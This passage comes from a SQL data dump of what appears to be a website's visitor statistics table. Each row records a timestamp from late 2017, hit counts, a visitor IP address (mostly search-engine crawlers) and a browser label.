,'51.255.65.69','other'),(162408,1506807256,1,1,0,0,'51.255.65.92','other'),(162409,1506807281,1,1,0,0,'51.255.64.106','other'),(162410,1506807441,1,1,0,0,'217.182.132.193','other'),(162411,1506807491,1,0,1,0,'68.180.229.52',''),(162412,1506807509,1,0,1,0,'66.249.64.30',''),(162413,1506807760,1,1,0,0,'51.255.71.120','other'),(162414,1506807814,1,1,0,0,'151.80.27.116','other'),(162415,1506808232,1,1,0,0,'217.182.132.34','other'),(162416,1506808295,1,1,0,0,'178.154.171.75','other'),(162417,1506808902,1,1,0,0,'164.132.162.156','other'),(162418,1506809482,1,1,0,0,'51.255.71.98','other'),(162419,1506809509,1,1,0,0,'40.77.167.5','other'),(162420,1506810121,1,1,0,0,'141.8.142.91','other'),(162421,1506810405,1,1,0,0,'51.255.71.98','other'),(162422,1506810816,1,1,0,0,'8.29.198.26','other'),(162423,1506810932,1,1,0,0,'217.182.132.90','other'),(162424,1506811231,1,1,0,0,'217.182.132.73','other'),(162425,1506811371,1,0,1,0,'68.180.229.52',''),(162426,1506811561,1,1,0,0,'51.255.65.55','other'),(162427,1506811812,1,1,0,0,'5.45.207.9','other'),(162428,1506812047,1,1,0,0,'217.182.132.65','other'),(162429,1506812235,1,1,0,0,'51.255.65.56','other'),(162430,1506813206,1,0,1,0,'66.249.64.29',''),(162431,1506813365,1,1,0,0,'51.255.65.4','other'),(162432,1506813504,3,3,0,0,'46.229.168.74','other'),(162433,1506813522,3,3,0,0,'46.229.168.71','other'),(162434,1506813540,5,5,0,0,'46.229.168.79','other'),(162435,1506813616,6,6,0,0,'46.229.168.72','other'),(162436,1506813617,7,7,0,0,'46.229.168.77','other'),(162437,1506813631,2,2,0,0,'46.229.168.65','other'),(162438,1506813648,5,5,0,0,'46.229.168.80','other'),(162439,1506813666,6,6,0,0,'46.229.168.69','other'),(162440,1506813685,5,5,0,0,'46.229.168.73','other'),(162441,1506813726,4,4,0,0,'46.229.168.66','other'),(162442,1506813757,5,5,0,0,'46.229.168.68','other'),(162443,1506813776,3,3,0,0,'46.229.168.76','other'),(162444,1506813788,1,1,0,0,'217.182.132.63','other'),(162445,1506813939,3,3,0,0,'46.229.168.75','other'),(162446,1506813964,3,3,0,0,'46.229.168.78','other'),(162447,1506813993,4,4,0,0,'46.229.168.70','other'),(162448,1506814157,6,6,0,0,'46.229.168.67','other'),(162449,1506814458,1,1,0,0,'217.182.132.176','other'),(162450,1506814464,4,4,0,0,'46.229.168.79','other'),(162451,1506814577,6,6,0,0,'46.229.168.80','other'),(162452,1506814611,1,1,0,0,'183.87.114.130','firefox'),(162453,1506814641,4,4,0,0,'46.229.168.73','other'),(162454,1506814649,1,1,0,0,'217.182.132.7','other'),(162455,1506814668,4,4,0,0,'46.229.168.66','other'),(162456,1506814731,7,7,0,0,'46.229.168.74','other'),(162457,1506814821,4,4,0,0,'46.229.168.68','other'),(162458,1506814876,3,3,0,0,'46.229.168.69','other'),(162459,1506814894,4,4,0,0,'46.229.168.71','other'),(162460,1506815002,5,5,0,0,'46.229.168.76','other'),(162461,1506815036,7,7,0,0,'46.229.168.72','other'),(162462,1506815256,3,3,0,0,'46.229.168.67','other'),(162463,1506815381,1,1,0,0,'46.229.168.77','other'),(162464,1506815439,4,4,0,0,'46.229.168.79','other'),(162465,1506815487,5,5,0,0,'46.229.168.78','other'),(162466,1506815566,5,5,0,0,'46.229.168.75','other'),(162467,1506815567,9,9,0,0,'46.229.168.73','other'),(162468,1506815675,5,5,0,0,'46.229.168.74','other'),(162469,1506815747,3,3,0,0,'46.229.168.70','other'),(162470,1506815801,6,6,0,0,'46.229.168.80','other'),(162471,1506815874,4,4,0,0,'46.229.168.71','other'),(162473,1506815946,7,7,0,0,'46.229.168.68','other'),(162474,1506816084,8,8,0,0,'46.229.168.69','other'),(162475,1506816110,4,4,0,0,'46.229.168.76','other'),(162476,1506816225,6,6,0,0,'46.229.168.72','other'),(162477,1506816287,8,8,0,0,'46.229.168.65','other'),(162478,1506816340,3,3,0,0,'46.229.168.79','other'),(162479,1506816348,3,3,0,0,'46.229.168.67','other'),(162480,1506816448,2,2,0,0,'46.229.168.66','other'),(162481,1506816497,8,8,0,0,'46.229.168.77','other'),(162482,1506816514,1,1,0,0,'217.182.132.147','other'),(162483,1506816517,3,3,0,0,'46.229.168.73','other'),(162484,1506816577,4,4,0,0,'46.229.168.78','other'),(162485,1506816715,3,3,0,0,'46.229.168.74','other'),(162486,1506816781,2,2,0,0,'46.229.168.80','other'),(162487,1506816854,1,1,0,0,'46.229.168.71','other'),(162488,1506816861,1,1,0,0,'217.182.132.30','other'),(162489,1506816929,1,1,0,0,'217.182.132.27','other'),(162490,1506816963,1,0,1,0,'66.249.70.29',''),(162491,1506816987,1,1,0,0,'46.229.168.68','other'),(162492,1506817011,3,3,0,0,'46.229.168.70','other'),(162493,1506817031,1,1,0,0,'51.255.65.42','other'),(162494,1506817432,1,1,0,0,'51.255.71.100','other'),(162495,1506817537,1,1,0,0,'217.182.132.77','other'),(162496,1506817890,1,0,1,0,'66.249.64.28',''),(162497,1506818890,1,1,0,0,'51.255.65.18','other'),(162498,1506818896,1,1,0,0,'178.154.171.26','other'),(162499,1506819091,1,1,0,0,'180.76.15.6','other'),(162500,1506819119,1,1,0,0,'217.182.132.27','other'),(162501,1506820266,1,1,0,0,'37.9.113.93','other'),(162502,1506820546,1,1,0,0,'51.255.65.29','other'),(162503,1506820666,1,0,1,0,'68.180.229.52',''),(162504,1506820831,1,1,0,0,'51.255.65.50','other'),(162505,1506820988,1,1,0,0,'51.255.71.100','other'),(162506,1506821001,1,1,0,0,'217.182.132.32','other'),(162507,1506821139,1,1,0,0,'51.255.71.127','other'),(162508,1506821567,1,1,0,0,'51.255.65.57','other'),(162509,1506821652,1,1,0,0,'8.29.198.26','other'),(162510,1506821674,1,1,0,0,'216.244.66.237','other'),(162511,1506821841,1,1,0,0,'51.255.65.44','other'),(162512,1506822205,1,1,0,0,'217.182.132.25','other'),(162513,1506822346,1,1,0,0,'37.9.113.188','other'),(162514,1506822429,1,1,0,0,'91.209.11.236','other'),(162515,1506822465,1,1,0,0,'217.182.132.94','other'),(162516,1506822585,1,1,0,0,'51.255.65.49','other'),(162517,1506822882,1,1,0,0,'5.45.207.9','other'),(162518,1506823627,2,2,0,0,'217.182.132.95','other'),(162519,1506823681,1,0,1,0,'66.249.64.29',''),(162520,1506823769,2,2,0,0,'91.209.11.236','other'),(162521,1506824039,1,1,0,0,'51.255.64.106','other'),(162522,1506824101,1,1,0,0,'51.255.65.63','other'),(162523,1506824396,1,0,1,0,'68.180.229.52',''),(162524,1506824726,1,1,0,0,'51.255.65.89','other'),(162525,1506824739,1,1,0,0,'217.182.132.30','other'),(162526,1506825740,1,1,0,0,'217.182.132.156','other'),(162527,1506825966,1,1,0,0,'217.182.132.186','other'),(162528,1506825968,1,1,0,0,'54.165.59.7','other'),(162529,1506826282,1,1,0,0,'91.209.11.236','other'),(162530,1506826837,1,1,0,0,'164.132.162.160','other'),(162531,1506827370,1,1,0,0,'51.255.71.101','other'),(162532,1506828891,1,1,0,0,'178.137.16.167','msie'),(162533,1506828953,1,1,0,0,'51.255.65.91','other'),(162534,1506828958,1,1,0,0,'137.74.207.101','other'),(162535,1506829817,1,1,0,0,'164.132.162.164','other'),(162536,1506830163,1,1,0,0,'51.255.71.110','other'),(162537,1506830186,1,1,0,0,'51.255.65.32','other'),(162538,1506830415,1,0,1,0,'68.180.230.153',''),(162539,1506830418,1,0,1,0,'66.249.70.29',''),(162540,1506830425,1,0,1,0,'68.180.229.52',''),(162541,1506830627,1,1,0,0,'5.45.207.9','other'),(162542,1506830637,1,1,0,0,'217.69.133.194','other'),(162543,1506830765,1,1,0,0,'217.182.132.181','other'),(162544,1506830818,1,1,0,0,'217.182.132.24','other'),(162545,1506830828,1,1,0,0,'217.182.132.64','other'),(162546,1506831433,1,0,1,0,'66.249.64.28',''),(162547,1506832109,1,1,0,0,'217.182.132.70','other'),(162548,1506832372,1,1,0,0,'164.132.162.153','other'),(162549,1506832461,1,1,0,0,'5.45.207.64','other'),(162550,1506832485,1,1,0,0,'8.29.198.26','other'),(162551,1506832665,1,1,0,0,'51.255.71.101','other'),(162552,1506833039,1,1,0,0,'51.255.65.76','other'),(162553,1506833042,1,1,0,0,'217.182.132.75','other'),(162554,1506833096,1,1,0,0,'217.182.132.25','other'),(162555,1506833256,1,1,0,0,'217.182.132.7','other'),(162556,1506833362,2,2,0,0,'91.209.11.236','other'),(162557,1506833571,1,0,1,0,'68.180.230.153',''),(162558,1506833866,1,1,0,0,'51.255.65.51','other'),(162559,1506834441,2,2,0,0,'91.209.11.236','other'),(162560,1506834678,1,1,0,0,'51.255.71.112','other'),(162561,1506834788,1,1,0,0,'217.182.132.181','other'),(162562,1506834864,1,0,1,0,'66.249.64.29',''),(162563,1506835303,1,1,0,0,'51.255.71.117','other'),(162564,1506835420,1,1,0,0,'91.209.11.236','other'),(162565,1506836010,1,0,1,0,'68.180.230.153',''),(162566,1506836767,1,1,0,0,'5.45.207.64','other'),(162567,1506836854,1,1,0,0,'217.182.132.95','other'),(162568,1506837236,1,1,0,0,'51.255.71.133','other'),(162569,1506837463,3,0,3,0,'66.249.64.29',''),(162570,1506837582,1,1,0,0,'164.132.162.153','other'),(162571,1506837707,1,1,0,0,'51.255.71.121','other'),(162572,1506837890,1,0,1,0,'68.180.230.153',''),(162573,1506838232,2,2,0,0,'54.165.59.7','other'),(162574,1506838247,1,1,0,0,'51.255.65.15','other'),(162575,1506838891,1,1,0,0,'178.154.171.75','other'),(162576,1506839356,1,1,0,0,'137.74.201.108','other'),(162577,1506839384,1,0,1,0,'66.249.64.30',''),(162578,1506839450,1,1,0,0,'51.255.65.60','other'),(162579,1506839812,1,1,0,0,'5.45.207.64','other'),(162580,1506839874,1,1,0,0,'217.182.132.152','other'),(162581,1506840343,1,1,0,0,'207.46.13.29','other'),(162582,1506840501,2,0,2,0,'68.180.230.153',''),(162583,1506840643,2,0,2,0,'66.249.64.28',''),(162584,1506841042,2,2,0,0,'54.165.59.7','other'),(162585,1506841044,1,0,1,0,'66.249.70.25',''),(162586,1506841509,1,1,0,0,'137.74.207.116','other'),(162587,1506842189,1,1,0,0,'217.182.132.15','other'),(162588,1506842233,1,1,0,0,'216.244.66.237','other'),(162589,1506842316,1,1,0,0,'217.182.132.157','other'),(162590,1506842367,1,0,1,0,'68.180.230.153',''),(162591,1506842456,1,1,0,0,'217.182.132.67','other'),(162592,1506842492,1,0,1,0,'66.249.70.25',''),(162593,1506843017,3,3,0,0,'173.212.252.5','other'),(162594,1506843301,1,1,0,0,'51.255.65.49','other'),(162595,1506843320,1,1,0,0,'8.29.198.26','other'),(162596,1506843399,1,1,0,0,'51.255.71.111','other'),(162597,1506843513,2,2,0,0,'5.45.207.9','other'),(162598,1506845290,1,1,0,0,'217.182.132.83','other'),(162599,1506845336,1,1,0,0,'5.45.207.64','other'),(162600,1506845425,1,0,1,0,'66.249.64.29',''),(162601,1506845460,1,0,1,0,'68.180.230.153',''),(162602,1506845842,1,1,0,0,'51.255.65.76','other'),(162603,1506845972,1,1,0,0,'217.182.132.152','other'),(162604,1506846121,1,1,0,0,'51.255.65.9','other'),(162605,1506846449,1,1,0,0,'51.255.71.117','other'),(162606,1506847098,1,1,0,0,'91.196.178.65','chrome'),(162607,1506847576,1,1,0,0,'178.154.171.75','other'),(162608,1506847923,1,1,0,0,'51.255.71.125','other'),(162609,1506848040,1,1,0,0,'51.255.71.123','other'),(162610,1506848247,1,1,0,0,'51.255.65.13','other'),(162611,1506848263,1,1,0,0,'5.45.207.12','other'),(162612,1506848345,1,1,0,0,'217.182.132.176','other'),(162613,1506848384,3,3,0,0,'5.45.207.9','other'),(162614,1506848500,1,1,0,0,'217.182.132.152','other'),(162615,1506848548,1,1,0,0,'51.255.65.35','other'),(162616,1506848667,1,1,0,0,'217.69.133.5','other'),(162617,1506848705,1,1,0,0,'51.255.65.53','other'),(162618,1506849047,1,1,0,0,'217.182.132.19','other'),(162619,1506849222,1,1,0,0,'217.182.132.183','other'),(162620,1506849397,1,0,1,0,'68.180.230.153',''),(162621,1506849924,1,1,0,0,'51.255.71.101','other'),(162622,1506849963,1,0,1,0,'68.180.229.52',''),(162623,1506849964,1,1,0,0,'137.74.207.109','other'),(162624,1506850038,1,1,0,0,'51.255.65.34','other'),(162625,1506850277,1,1,0,0,'5.45.207.64','other'),(162626,1506850489,1,1,0,0,'51.255.65.70','other'),(162627,1506850492,1,1,0,0,'5.45.207.9','other'),(162628,1506850562,1,0,1,0,'68.180.230.153',''),(162629,1506851993,1,0,1,0,'68.180.230.153',''),(162630,1506852016,1,1,0,0,'51.255.65.76','other'),(162631,1506852052,1,1,0,0,'217.69.133.85','other'),(162632,1506852193,1,1,0,0,'217.182.132.241','other'),(162633,1506852548,1,1,0,0,'66.249.70.25','chrome'),(162634,1506853390,1,1,0,0,'51.255.71.118','other'),(162635,1506853683,1,1,0,0,'217.182.132.181','other'),(162636,1506853693,1,1,0,0,'217.182.132.180','other'),(162637,1506853727,1,1,0,0,'93.74.212.147','firefox'),(162638,1506853743,1,1,0,0,'5.45.207.64','other'),(162639,1506853745,1,1,0,0,'51.255.65.46','other'),(162640,1506854151,1,1,0,0,'8.29.198.26','other'),(162641,1506854163,1,1,0,0,'37.9.113.188','other'),(162642,1506854304,1,1,0,0,'178.154.171.28','other'),(162643,1506854606,1,1,0,0,'141.8.183.15','other'),(162644,1506854631,1,1,0,0,'217.182.132.28','other'),(162645,1506854736,1,1,0,0,'217.182.132.240','other'),(162646,1506855035,1,1,0,0,'217.182.132.151','other'),(162647,1506855164,1,1,0,0,'217.182.132.52','other'),(162648,1506855797,1,1,0,0,'51.255.65.4','other'),(162649,1506855972,2,2,0,0,'5.45.207.9','other'),(162650,1506856112,1,1,0,0,'91.196.178.167','chrome'),(162651,1506856173,1,1,0,0,'51.255.65.90','other'),(162652,1506856923,1,1,0,0,'217.182.132.61','other'),(162653,1506856993,1,1,0,0,'217.182.132.67','other'),(162654,1506857257,1,1,0,0,'51.255.71.125','other'),(162655,1506858332,1,1,0,0,'51.255.71.127','other'),(162656,1506858337,1,1,0,0,'5.45.207.64','other'),(162657,1506858351,1,0,1,0,'68.180.230.153',''),(162658,1506859134,1,1,0,0,'217.182.132.85','other'),(162659,1506859305,1,1,0,0,'5.45.207.64','other'),(162660,1506859334,1,1,0,0,'216.244.66.237','other'),(162661,1506859730,1,1,0,0,'217.182.132.176','other'),(162662,1506860082,1,1,0,0,'178.154.171.75','other'),(162663,1506860838,1,1,0,0,'51.255.71.110','other'),(162664,1506860856,1,1,0,0,'164.132.162.157','other'),(162665,1506861183,1,1,0,0,'51.255.65.47','other'),(162666,1506861263,1,1,0,0,'217.182.132.172','other'),(162667,1506862158,1,1,0,0,'91.124.110.140','chrome'),(162668,1506862165,1,1,0,0,'217.182.132.58','other'),(162669,1506862917,1,0,1,0,'66.249.64.8',''),(162670,1506863072,1,1,0,0,'137.74.207.161','other'),(162671,1506863343,1,1,0,0,'217.182.132.22','other'),(162672,1506863383,1,1,0,0,'164.132.162.188','other'),(162673,1506863437,2,2,0,0,'5.45.207.64','other'),(162674,1506864273,1,1,0,0,'137.74.207.102','other'),(162675,1506864629,1,1,0,0,'5.45.207.9','other'),(162676,1506864750,1,1,0,0,'216.244.66.237','other'),(162677,1506864802,1,1,0,0,'51.255.71.122','other'),(162678,1506864986,1,1,0,0,'8.29.198.26','other'),(162679,1506865179,1,1,0,0,'207.46.13.38','other'),(162680,1506865180,1,1,0,0,'217.182.132.35','other'),(162681,1506865324,1,1,0,0,'51.255.65.70','other'),(162682,1506865747,1,1,0,0,'51.255.65.50','other'),(162683,1506865935,1,1,0,0,'217.182.132.70','other'),(162684,1506866434,1,1,0,0,'176.108.7.32','chrome'),(162685,1506867139,1,1,0,0,'216.244.66.237','other'),(162686,1506867606,2,2,0,0,'217.182.132.54','other'),(162687,1506867785,1,1,0,0,'217.182.132.66','other'),(162688,1506867798,1,1,0,0,'217.182.132.153','other'),(162689,1506867826,1,1,0,0,'217.182.132.188','other'),(162690,1506868011,1,1,0,0,'51.255.65.26','other'),(162691,1506868120,1,1,0,0,'5.45.207.9','other'),(162692,1506868135,1,1,0,0,'40.77.167.5','other'),(162693,1506868649,1,1,0,0,'5.45.207.64','other'),(162694,1506869333,1,1,0,0,'5.45.207.9','other'),(162695,1506869355,1,1,0,0,'217.182.132.51','other'),(162696,1506869569,1,1,0,0,'51.255.65.63','other'),(162697,1506869861,1,1,0,0,'217.182.132.17','other'),(162698,1506869971,2,2,0,0,'5.45.207.64','other'),(162699,1506870000,1,0,1,0,'68.180.230.153',''),(162700,1506870799,1,1,0,0,'91.209.11.236','other'),(162701,1506871486,2,0,2,0,'66.249.70.27',''),(162702,1506871544,1,0,1,0,'66.249.70.25',''),(162703,1506871678,1,1,0,0,'217.182.132.179','other'),(162704,1506871823,2,2,0,0,'5.45.207.64','other'),(162705,1506872061,1,0,1,0,'68.180.230.153',''),(162706,1506872154,1,1,0,0,'178.154.171.75','other'),(162707,1506872244,1,1,0,0,'37.9.113.87','other'),(162708,1506872316,1,1,0,0,'216.244.66.237','other'),(162709,1506872448,1,1,0,0,'217.182.132.176','other'),(162710,1506872597,1,1,0,0,'51.255.65.36','other'),(162711,1506873065,1,1,0,0,'51.255.65.97','other'),(162712,1506873137,1,1,0,0,'217.182.132.18','other'),(162713,1506874276,1,1,0,0,'5.45.207.9','other'),(162714,1506874596,2,2,0,0,'217.69.133.6','other'),(162715,1506875630,1,1,0,0,'157.55.39.225','other'),(162716,1506875758,1,1,0,0,'5.45.207.64','other'),(162717,1506875813,1,1,0,0,'51.255.71.128','other'),(162718,1506875821,1,1,0,0,'8.29.198.27','other'),(162719,1506876239,1,1,0,0,'217.182.132.153','other'),(162720,1506876525,1,1,0,0,'51.255.65.93','other'),(162721,1506876930,1,1,0,0,'5.45.207.9','other'),(162722,1506876975,1,1,0,0,'217.182.132.7','other'),(162723,1506877095,2,0,2,0,'68.180.230.153',''),(162724,1506877121,1,1,0,0,'217.182.132.57','other'),(162725,1506877385,1,1,0,0,'217.182.132.4','other'),(162726,1506877948,1,1,0,0,'91.209.11.236','other'),(162727,1506878088,1,1,0,0,'217.182.132.54','other'),(162728,1506879223,1,1,0,0,'5.45.207.9','other'),(162729,1506879225,1,1,0,0,'217.69.133.5','other'),(162730,1506879567,1,0,1,0,'66.249.64.6',''),(162731,1506879612,1,1,0,0,'217.182.132.20','other'),(162732,1506880143,1,1,0,0,'5.45.207.64','other'),(162733,1506880247,1,1,0,0,'137.74.207.114','other'),(162734,1506881158,1,1,0,0,'51.255.71.115','other'),(162735,1506881446,1,1,0,0,'64.246.161.190','firefox'),(162736,1506881584,1,1,0,0,'5.45.207.64','other'),(162737,1506881784,1,1,0,0,'5.45.207.9','other'),(162738,1506882032,1,1,0,0,'164.132.164.180','other'),(162739,1506882436,1,1,0,0,'51.255.64.106','other'),(162740,1506882550,1,1,0,0,'51.255.71.130','other'),(162741,1506882584,4,4,0,0,'173.208.157.186','other'),(162742,1506882592,1,1,0,0,'54.165.59.7','other'),(162743,1506883922,1,1,0,0,'137.74.207.110','other'),(162744,1506884768,1,1,0,0,'51.255.65.6','other'),(162745,1506885086,1,1,0,0,'217.182.132.17','other'),(162746,1506885146,1,0,1,0,'66.249.64.13',''),(162747,1506885204,1,1,0,0,'51.255.71.119','other'),(162748,1506885513,1,1,0,0,'217.182.132.95','other'),(162749,1506885608,1,1,0,0,'217.182.132.21','other'),(162750,1506885642,1,1,0,0,'217.182.132.188','other'),(162751,1506885718,1,0,1,0,'66.249.70.25',''),(162752,1506885963,1,1,0,0,'137.74.207.119','other'),(162753,1506885966,1,1,0,0,'217.182.132.152','other'),(162754,1506886154,1,0,1,0,'68.180.229.52',''),(162755,1506886385,1,1,0,0,'5.45.207.9','other'),(162756,1506886467,1,1,0,0,'164.132.164.180','other'),(162757,1506886473,1,1,0,0,'51.255.65.6','other'),(162758,1506886658,1,1,0,0,'8.29.198.26','other'),(162759,1506886882,1,1,0,0,'162.210.196.97','other'),(162760,1506887044,1,1,0,0,'51.255.65.3','other'),(162761,1506887085,2,2,0,0,'5.45.207.64','other'),(162762,1506887347,1,1,0,0,'66.249.70.29','chrome'),(162763,1506887485,1,1,0,0,'178.154.171.75','other'),(162764,1506887581,1,0,1,0,'68.180.230.153',''),(162765,1506888490,1,0,1,0,'66.249.70.25',''),(162766,1506888848,1,1,0,0,'51.255.65.15','other'),(162767,1506888896,1,1,0,0,'157.55.39.45','other'),(162768,1506889145,1,1,0,0,'207.46.13.38','other'),(162769,1506889591,1,1,0,0,'95.108.181.122','other'),(162770,1506889611,1,1,0,0,'217.182.132.77','other'),(162771,1506889901,1,1,0,0,'141.8.142.81','other'),(162772,1506890241,1,1,0,0,'51.255.65.83','other'),(162773,1506890249,2,2,0,0,'5.45.207.9','other'),(162774,1506890346,1,1,0,0,'51.255.65.4','other'),(162775,1506890566,1,1,0,0,'217.182.132.172','other'),(162776,1506891004,1,1,0,0,'5.45.207.64','other'),(162777,1506891269,1,0,1,0,'66.249.64.13',''),(162778,1506891544,1,1,0,0,'37.9.113.75','other'),(162779,1506891639,1,1,0,0,'51.255.65.40','other'),(162780,1506891984,1,1,0,0,'137.74.207.119','other'),(162781,1506892085,1,1,0,0,'51.255.71.116','other'),(162782,1506892648,1,1,0,0,'217.182.132.91','other'),(162783,1506893289,1,1,0,0,'51.255.65.49','other'),(162784,1506893936,1,1,0,0,'51.255.65.14','other'),(162785,1506894325,1,1,0,0,'51.255.71.111','other'),(162786,1506894336,1,1,0,0,'51.255.65.32','other'),(162787,1506894714,1,0,1,0,'68.180.230.153',''),(162788,1506894909,1,1,0,0,'157.55.39.83','other'),(162789,1506895051,1,1,0,0,'164.132.162.158','other'),(162790,1506895285,1,1,0,0,'51.255.71.127','other'),(162791,1506896467,1,1,0,0,'217.182.132.21','other'),(162792,1506896752,1,1,0,0,'46.161.9.55','chrome'),(162793,1506896895,1,1,0,0,'51.255.65.55','other'),(162794,1506897266,1,1,0,0,'217.182.132.154','other'),(162795,1506897494,1,1,0,0,'8.29.198.25','other'),(162796,1506898121,1,1,0,0,'180.76.15.157','other'),(162797,1506898213,1,1,0,0,'51.255.65.85','other'),(162798,1506898264,1,1,0,0,'51.255.65.66','other'),(162799,1506898489,1,0,1,0,'66.249.64.6',''),(162800,1506899031,1,1,0,0,'217.182.132.190','other'),(162801,1506899048,1,1,0,0,'217.182.132.82','other'),(162802,1506899123,1,1,0,0,'217.182.132.66','other'),(162803,1506899179,1,1,0,0,'137.74.207.159','other'),(162804,1506899205,1,1,0,0,'51.255.65.82','other'),(162805,1506899343,1,1,0,0,'217.69.133.5','other'),(162806,1506899547,1,1,0,0,'51.255.71.111','other'),(162807,1506900113,1,1,0,0,'51.255.65.24','other'),(162808,1506900211,1,1,0,0,'37.9.113.93','other'),(162809,1506900932,1,1,0,0,'217.182.132.19','other'),(162810,1506901003,1,1,0,0,'91.209.11.236','other'),(162811,1506902110,1,1,0,0,'141.8.142.201','other'),(162812,1506902495,1,0,1,0,'68.180.230.153',''),(162813,1506902576,1,1,0,0,'51.255.65.49','other'),(162814,1506902785,1,1,0,0,'217.182.132.171','other'),(162815,1506902907,1,1,0,0,'51.255.65.62','other'),(162816,1506902955,1,1,0,0,'91.209.11.236','other'),(162817,1506902985,1,1,0,0,'95.108.213.9','other'),(162818,1506903154,1,1,0,0,'51.255.65.21','other'),(162819,1506903369,1,1,0,0,'217.182.132.15','other'),(162820,1506903778,1,1,0,0,'217.182.132.85','other'),(162821,1506905262,1,1,0,0,'216.244.66.237','other'),(162822,1506905836,1,1,0,0,'217.182.132.146','other'),(162823,1506906041,1,1,0,0,'217.182.132.28','other'),(162824,1506906093,1,1,0,0,'178.154.200.35','other'),(162825,1506906301,1,0,1,0,'68.180.229.52',''),(162826,1506906559,1,1,0,0,'51.255.65.93','other'),(162827,1506906568,1,1,0,0,'178.154.171.26','other'),(162828,1506906869,1,1,0,0,'5.45.207.9','other'),(162829,1506907001,1,1,0,0,'5.45.207.64','other'),(162830,1506907567,1,0,1,0,'68.180.230.153',''),(162831,1506907625,1,1,0,0,'66.249.70.27','chrome'),(162832,1506907659,1,1,0,0,'216.244.66.237','other'),(162833,1506907666,1,1,0,0,'51.255.65.90','other'),(162834,1506907913,1,1,0,0,'5.45.207.9','other'),(162835,1506908326,1,1,0,0,'8.29.198.25','other'),(162836,1506908633,1,1,0,0,'5.45.207.64','other'),(162837,1506908859,1,1,0,0,'217.182.132.23','other'),(162838,1506909025,1,1,0,0,'51.255.65.61','other'),(162839,1506909203,1,1,0,0,'5.45.207.9','other'),(162840,1506909707,2,2,0,0,'216.244.66.237','other'),(162841,1506910433,1,1,0,0,'5.45.207.64','other'),(162842,1506910765,1,0,1,0,'66.249.64.6',''),(162843,1506910830,2,2,0,0,'178.154.171.75','other'),(162844,1506911167,1,1,0,0,'51.255.65.76','other'),(162845,1506911319,1,1,0,0,'5.45.207.9','other'),(162846,1506911480,1,1,0,0,'180.76.15.20','other'),(162847,1506912018,1,1,0,0,'91.209.11.236','other'),(162848,1506912172,1,1,0,0,'217.182.132.75','other'),(162849,1506912576,1,1,0,0,'216.244.66.237','other'),(162850,1506912593,1,1,0,0,'51.255.65.56','other'),(162851,1506912721,1,1,0,0,'5.45.207.64','other'),(162852,1506913153,1,0,1,0,'66.249.70.25',''),(162853,1506913610,1,0,1,0,'66.249.64.8',''),(162854,1506914395,1,1,0,0,'217.182.132.28','other'),(162855,1506914614,1,1,0,0,'217.182.132.150','other'),(162856,1506914922,1,1,0,0,'5.45.207.64','other'),(162857,1506914990,1,1,0,0,'217.182.132.193','other'),(162858,1506915114,1,1,0,0,'178.154.171.75','other'),(162859,1506915153,3,3,0,0,'5.45.207.9','other'),(162860,1506915359,1,0,1,0,'68.180.229.52',''),(162861,1506915534,1,1,0,0,'46.229.168.79','other'),(162862,1506915588,4,4,0,0,'46.229.168.67','other'),(162863,1506915590,7,7,0,0,'46.229.168.69','other'),(162864,1506915606,1,1,0,0,'95.220.211.100','chrome'),(162865,1506915614,1,1,0,0,'46.229.168.66','other'),(162866,1506915627,4,4,0,0,'46.229.168.73','other'),(162867,1506915643,4,4,0,0,'46.229.168.65','other'),(162868,1506915673,1,1,0,0,'46.229.168.77','other'),(162869,1506915682,4,4,0,0,'46.229.168.74','other'),(162870,1506915722,1,0,1,0,'66.249.64.13',''),(162871,1506915760,5,5,0,0,'46.229.168.70','other'),(162872,1506915765,5,5,0,0,'46.229.168.75','other'),(162873,1506915775,7,7,0,0,'46.229.168.78','other'),(162874,1506915862,5,5,0,0,'46.229.168.76','other'),(162875,1506915883,8,8,0,0,'46.229.168.68','other'),(162876,1506915898,10,10,0,0,'46.229.168.80','other'),(162877,1506915978,2,0,2,0,'68.180.230.153',''),(162878,1506916092,2,2,0,0,'5.45.207.9','other'),(162879,1506916222,6,6,0,0,'46.229.168.71','other'),(162880,1506916460,1,1,0,0,'217.69.133.9','other'),(162881,1506916495,9,9,0,0,'46.229.168.72','other'),(162882,1506916583,7,7,0,0,'46.229.168.79','other'),(162883,1506916590,2,2,0,0,'5.45.207.64','other'),(162884,1506916603,1,1,0,0,'46.229.168.74','other'),(162885,1506916619,1,1,0,0,'46.229.168.73','other'),(162886,1506916674,5,5,0,0,'46.229.168.70','other'),(162887,1506916768,1,1,0,0,'217.182.132.148','other'),(162888,1506916787,2,2,0,0,'46.229.168.77','other'),(162889,1506916799,3,3,0,0,'46.229.168.65','other'),(162890,1506916843,6,6,0,0,'46.229.168.67','other'),(162891,1506916871,6,6,0,0,'46.229.168.80','other'),(162892,1506916925,1,1,0,0,'46.229.168.76','other'),(162893,1506917053,3,3,0,0,'46.229.168.68','other'),(162894,1506917125,5,5,0,0,'46.229.168.69','other'),(162895,1506917161,4,4,0,0,'46.229.168.75','other'),(162896,1506917183,2,2,0,0,'46.229.168.78','other'),(162897,1506917344,1,1,0,0,'46.229.168.71','other'),(162898,1506917355,1,1,0,0,'51.255.71.119','other'),(162899,1506917477,1,1,0,0,'217.69.133.2','other'),(162900,1506917543,3,3,0,0,'5.45.207.64','other'),(162901,1506917582,1,1,0,0,'217.182.132.151','other'),(162902,1506917739,1,1,0,0,'5.45.207.9','other'),(162903,1506917905,1,0,1,0,'66.249.64.8',''),(162904,1506918190,1,1,0,0,'51.255.65.3','other'),(162905,1506919014,1,1,0,0,'107.167.105.220','opera'),(162906,1506919048,1,1,0,0,'217.182.132.77','other'),(162907,1506919164,1,1,0,0,'8.29.198.25','other'),(162908,1506919184,1,0,1,0,'68.180.230.153',''),(162909,1506919309,1,1,0,0,'51.255.65.34','other'),(162910,1506919326,1,1,0,0,'51.255.71.117','other'),(162911,1506919510,1,1,0,0,'217.182.132.23','other'),(162912,1506919710,1,1,0,0,'217.182.132.186','other'),(162913,1506919890,1,1,0,0,'66.249.70.25','chrome'),(162914,1506919979,1,1,0,0,'217.182.132.20','other'),(162915,1506920007,1,1,0,0,'5.45.207.9','other'),(162916,1506920300,1,1,0,0,'217.182.132.17','other'),(162917,1506920378,1,1,0,0,'178.154.171.75','other'),(162918,1506920587,1,1,0,0,'40.77.167.5','other'),(162919,1506921143,2,2,0,0,'5.45.207.9','other'),(162920,1506921263,1,1,0,0,'51.255.65.54','other'),(162921,1506921701,1,1,0,0,'217.182.132.19','other'),(162922,1506921744,1,1,0,0,'217.69.133.218','other'),(162923,1506922094,3,3,0,0,'5.45.207.9','other'),(162924,1506922230,1,1,0,0,'91.196.178.68','chrome'),(162925,1506922494,1,1,0,0,'5.45.207.64','other'),(162926,1506922610,1,1,0,0,'207.4